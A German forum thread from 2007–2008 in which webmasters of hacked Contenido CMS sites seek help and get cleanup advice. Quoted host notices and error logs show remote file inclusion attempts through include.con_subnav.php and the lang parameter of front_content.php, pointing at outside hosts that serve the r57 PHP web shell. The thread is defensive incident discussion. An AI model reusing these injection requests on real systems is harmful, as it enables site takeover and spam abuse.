Account gehackt

Marten · Beitrag von **Marten** » Mo 6. Aug 2007, 19:47

Hallo miteinander,

wie ich gerade schon in diesem Beitrag http://contenido.org/forum/viewtopic.php?t=17809 geschrieben habe, wurde der Account tsv-neuss.de gehackt.

Da ich über die Suche zu der betreffenden Datei nix herausfinden konnte und definitiv nicht genug Ahnung von PHP habe, würde ich Euch bitten, mal über die Infos des Hosters (profihost.com) drüberzuschauen. Ich hoffe, das nötigste hier wiederzugeben:

Sehr geehrter Kunde,

Ihr Account tsv-neuss.de musste heute zu Ihrer Sicherheit gesperrt werden, da Ihr Account gehackt wurde. Es liefen diverse verbotene Skripte bzw. es wurde massiv gespammt.

Grund hierfür sind von Ihnen verwendete unsichere Skripte. Über das folgende Skript kam der Angreifer:

user.253.244.5.201.dial-ip.telemar.net.br - - [04/Aug/2007:03:38:56 +0200] "POST //contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.otriton.xpg.com.br/r57.txt?
HTTP/1.1" 500 2647
"http://www.tsv-neuss.de//contenido/incl ... br/r57.txt?"
"Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"

Über das Skript wurde ein externes Skript aufgerufen, so konnten Befehle auf Ihrem Speicherplatz ausgeführt werden.

[...]

Was macht die "include.con_subnav.php"? Kann ich die einfach als "Notfallplan" killen?

UNd noch eine Frage:
In dem oben erwähnen Beitrag habe ich schon auf mein Versions-Wirrwar hingewiesen. Kann ich einfah über die vorhandene 4.6.4 die 4.6.15 drüberspielen?

Oder .... ?

Vielen Dank für jeden Tipp!

Schöne Grüße
Marten[/quote]

Beitrag von **HerrB** » Di 7. Aug 2007, 08:47

Grundsätzlich kannst Du einfach die neue Version überspielen. Allerdings sind Hacker kreativ, sich den Zugang weiter offen zu halten. Du solltest daher Deinen Webspace einmal abräumen und wieder neu aufbauen. Die DB ist i.A. nicht betroffen.

Gruß
HerrB

Marten · Beitrag von **Marten** » Di 7. Aug 2007, 09:05

Hallo HerrB,

das heißt, ich kann einfach alles löschen (bis auf verwendete Bilder, Templates, etc) und spiele dann die Contenido-Installation einfach wieder ein?

Schöne Grüße
Marten

wosch · Beitrag von **wosch** » Di 7. Aug 2007, 13:31

Code: Alles auswählen

http://www.otriton.xpg.com.br/r57.txt

Damit wurde eine php-Shell auf deinem Webspace installiert.
Dieses Script ist zwar schon etwas älter, aber denach sehr gut, es kann sich selber umbennen, verschieben, ...
Es wird also noch auf deinem Webspace liegen und wartet auf den nächsten Einsatz.
Und genau das meint HerrB damit:

HerrB hat geschrieben:Allerdings sind Hacker kreativ, sich den Zugang weiter offen zu halten

Du solltest das machen was HerrB hier schreibt:

HerrB hat geschrieben:Du solltest daher Deinen Webspace einmal abräumen und wieder neu aufbauen

Du holst erstmal alles auf deinem PC.
Und dann mußt du _ALLES_ löschen was an Daten auf deinem Webspace ist.
(Außer dem der MySql-DB)
Danach wird Contenido neu installiert.
Und wenn jetzt noch Daten auf dem Webspace fehlen zum ordnungemäßen Betrieb von Contenido, mußt du alle Daten sehr, sehr gründlich prüfen (Editior, Bilder mal mit einem Bildbearbeitungsprogramm öffnen und neu abspreichern, ...) bevor du sie wieder auf dem Webspace überspielst (egal ob mit FTP oder über die Contenido-Dateiverwaltung).
(Der Grund: dieses php-Shell-Script könnte auch den Namen haben Bildvomregen.jpg oder Inhalt.txt oder mails.php oder ...)

Und sei sehr gründlich, die Script-URL (br) deutet auf sehr gut organisierte Cyperkriminelle hin die Ihr Handwerk verstehen.

kloevekorn · Beitrag von **kloevekorn** » Do 28. Feb 2008, 11:25

Liebe Leute,

ich denke, eine von mir betreute Site (4.6.4) ist auch auf genau diesem Weg gehackt worden. Verschiedene Dateien (.txt, .php) , die da nicht hingehören befinden sich in contenido/includes.

Wenn ich mich gut genug auskenne, scheint der Server als Spam-Zombie missbraucht worden zu sein. Die include.con_subnavi.php ist auch betroffen ... diese wurde schon mehrmals automatisiert mit "-SPAM" ergänzt. Der Sinn dessen erschließt sich mir überhaupt nicht, weil dann natürlich ein Fehler im Backend auftritt und man dann den Hack feststellt.

Meine Fragen bzw. Kommentare:
1 - die Dateien sind bei mir eindeutig über das Änderungsdatum zu identifizieren. Wieso sollten alle Contenido-Dateien überprüft werden, wenn über das Datum die Identifikation gelingt?
2 - ist es vielleicht als Soforthilfe sinnvoll, die Hackerdateien mit leeren Dateien zu überschreiben? Idee: Hacker erkennt die gewünschten Dateien und spricht diese an ... es passiert bloß nichts. Vielleicht besser, als wenn das auslösende böse Skript eine Contenido-Installation anspricht, auf der diese Skripte nicht vorhanden sind und dann einfach nachinstalliert?
3 - warum sind die Skripte so leicht zu erkennen. Sie sind voll mit "einschlägigen" bösen Begriffen. Will sagen, die Skripte sind nicht getarnt. Blöd von den Hackern, oder nicht?
4 - Wie und wo kann man den Missbrauch der eigenen Installation, z.B. als Spam-Zombie überprüfen? Wo in den Errorlogs erkennt man den Angriffspunkt?
5 - wie kommen die Dateien auf den Server? per FTP, oder schreibt irgendein Skript - ist das Passwort des FTP-Zugangs geknackt, oder wird das zum Schreiben der Dateien überhaupt nicht benötigt?

Thanks und Gruß
Jan

kloevekorn · Beitrag von **kloevekorn** » Do 28. Feb 2008, 20:18

Kann man aus diesem Logausschnitt von heute irgendwie erkennen, ob die Angriffe erfolgreich sind? Was genau machen die?

Wenn man sich die URLs in einem Browser aufruft, wird ein PHP-Code-Schnipsel angezeigt.

Was versuchen die, mit den SQL-Abfragen in con_rights, con_actions, con_area zu erreichen? Das ist ja wohl recht spezialisiertes Contenido-Hacking.

Es scheint sinnvoll, die betroffenen Webmaster zu informieren, dass die Server gehackt sind, oder?

Code: Alles auswählen


' WHERE idmod = '102'
[28-Feb-2008 16:20:34] PHP Warning:  Cannot modify header information - headers already sent by (output started at /.../.../cms/front_content.php:251) in /.../.../cms/front_content.php on line 351
[28-Feb-2008 16:20:34] PHP Warning:  Cannot modify header information - headers already sent by (output started at /.../.../cms/front_content.php:251) in /.../.../cms/front_content.php on line 351
[28-Feb-2008 16:20:34] PHP Warning:  Cannot modify header information - headers already sent by (output started at /.../.../cms/front_content.php:251) in /.../.../cms/front_content.php on line 351
[28-Feb-2008 16:20:34] PHP Warning:  Cannot modify header information - headers already sent by (output started at /.../.../cms/front_content.php:251) in /.../.../cms/front_content.php on line 351
[28-Feb-2008 16:20:34] /cms/front_content.php?client=1&idcat=0&idart=0&lang=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F&error=1 MySQL error 1064: You have an error in your SQL syntax near '://www.thoseguysfilms.com/forums/templates/subSilver/images/uza/laqipu/' at line 6
SELECT idright 
					FROM cont_rights AS A,
						 cont_actions AS B,
						 cont_area AS C
					 WHERE B.name = 'front_allow' AND C.name = 'str' AND A.user_id = 'nobody' AND A.idcat = '0'
							AND A.idarea = C.idarea AND B.idaction = A.idaction AND A.idlang = http://www.thoseguysfilms.com/forums/templates/subSilver/images/uza/laqipu/
[28-Feb-2008 16:20:34] /cms/front_content.php?client=1&idcat=0&idart=0&lang=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F&error=1 next_record called with no query pending.
[28-Feb-2008 16:20:35] PHP Warning:  Cannot modify header information - headers already sent by (output started at /.../.../cms/front_content.php:251) in /.../.../cms/front_content.php on line 351
[28-Feb-2008 16:20:35] /cms/front_content.php?client=1&idcat=0&idart=0&lang=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F&error=1 MySQL error 1064: You have an error in your SQL syntax near '://www.psikolojikyardim.org/etkinlik/include/eto/nixaz/' at line 6
SELECT idright 
					FROM cont_rights AS A,
						 cont_actions AS B,
						 cont_area AS C
					 WHERE B.name = 'front_allow' AND C.name = 'str' AND A.user_id = 'nobody' AND A.idcat = '0'
							AND A.idarea = C.idarea AND B.idaction = A.idaction AND A.idlang = http://www.psikolojikyardim.org/etkinlik/include/eto/nixaz/
[28-Feb-2008 16:20:35] /cms/front_content.php?client=1&idcat=0&idart=0&lang=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F&error=1 next_record called with no query pending.
[28-Feb-2008 16:20:35] PHP Warning:  Cannot modify header information - headers already sent by (output started at /.../.../cms/front_content.php:251) in /.../.../cms/front_content.php on line 351
[28-Feb-2008 16:20:35] /cms/front_content.php?client=1&idcat=0&idart=0&lang=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F&error=1 MySQL error 1064: You have an error in your SQL syntax near '://www.elettrodataservice.it/foto_articoli/onoda/iyegimi/' at line 6
SELECT idright 
					FROM cont_rights AS A,
						 cont_actions AS B,
						 cont_area AS C
					 WHERE B.name = 'front_allow' AND C.name = 'str' AND A.user_id = 'nobody' AND A.idcat = '0'
							AND A.idarea = C.idarea AND B.idaction = A.idaction AND A.idlang = http://www.elettrodataservice.it/foto_articoli/onoda/iyegimi/
[28-Feb-2008 16:20:35] /cms/front_content.php?client=1&idcat=0&idart=0&lang=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F&error=1 next_record called with no query pending.

Ich sensibilisiere mich gerade

wosch · Beitrag von **wosch** » Do 28. Feb 2008, 20:37

http://www.contenido.de/forum/viewtopic.php?t=20128

(Und halte deine Finger still bei allen was nicht de-Domain ist)